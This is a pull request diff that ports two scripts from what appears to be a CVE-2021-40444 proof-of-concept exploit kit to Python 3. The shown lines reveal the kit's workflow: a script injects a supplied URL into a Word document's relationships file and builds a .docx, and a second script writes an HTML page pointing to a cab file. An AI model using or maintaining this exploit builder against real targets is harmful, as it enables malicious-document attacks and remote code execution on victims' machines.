### PR TITLE
Python 2 died 623 days ago on 1/1/2020

### DIFF
--- a/CVE-2021-40444/source/generate_doc.py
+++ b/CVE-2021-40444/source/generate_doc.py
@@ -40,7 +40,7 @@ xml2 =(
 
 URL = (sys.argv[1])
 
-print "Usage: " + sys.argv[0] + " URL of HTML" 
+print("Usage: " + sys.argv[0] + " URL of HTML")
 
 xml_head = bytearray(binascii.unhexlify(xml1))
 xml_foot = bytearray(binascii.unhexlify(xml2))
@@ -52,7 +52,7 @@ file = "doc\\word\\_rels\\document.xml.rels"
 f = open(file,mode='wb')
 f.write(final)
 f.close()
-print ("[+] Injected URL in documents.xml.rels")
+print("[+] Injected URL in documents.xml.rels")
 
 def zip_directory(folder_path, zip_path):
     with zipfile.ZipFile(zip_path, mode='w') as zipf:
@@ -65,4 +65,4 @@ def zip_directory(folder_path, zip_path):
                 
 zip_directory('doc/', 'document.docx')
 
-print ("[+] document.docx file generated successfully")
+print("[+] document.docx file generated successfully")

--- a/CVE-2021-40444/source/generate_html.py
+++ b/CVE-2021-40444/source/generate_html.py
@@ -152,7 +152,7 @@ html4 = (
 
 URL = (sys.argv[1])
 
-print "Usage: " + sys.argv[0] + " URL of cab file" + " output.html"
+print("Usage: " + sys.argv[0] + " URL of cab file" + " output.html")
 
 ht1 = bytearray(binascii.unhexlify(html1))
 ht2 = bytearray(binascii.unhexlify(html2))
@@ -162,4 +162,4 @@ ht4 = bytearray(binascii.unhexlify(html4))
 file = sys.argv[2]
 f = open(file,mode='wb')
 f.write(ht1+URL+ht2+URL+ht3+URL+ht4)
-print ("[+] Generated HTML successfully")
+print("[+] Generated HTML successfully")


### PR DESCRIPTION
Python 2 died 623 days ago on 1/1/2020 so it might no longer be installed on newer operating systems.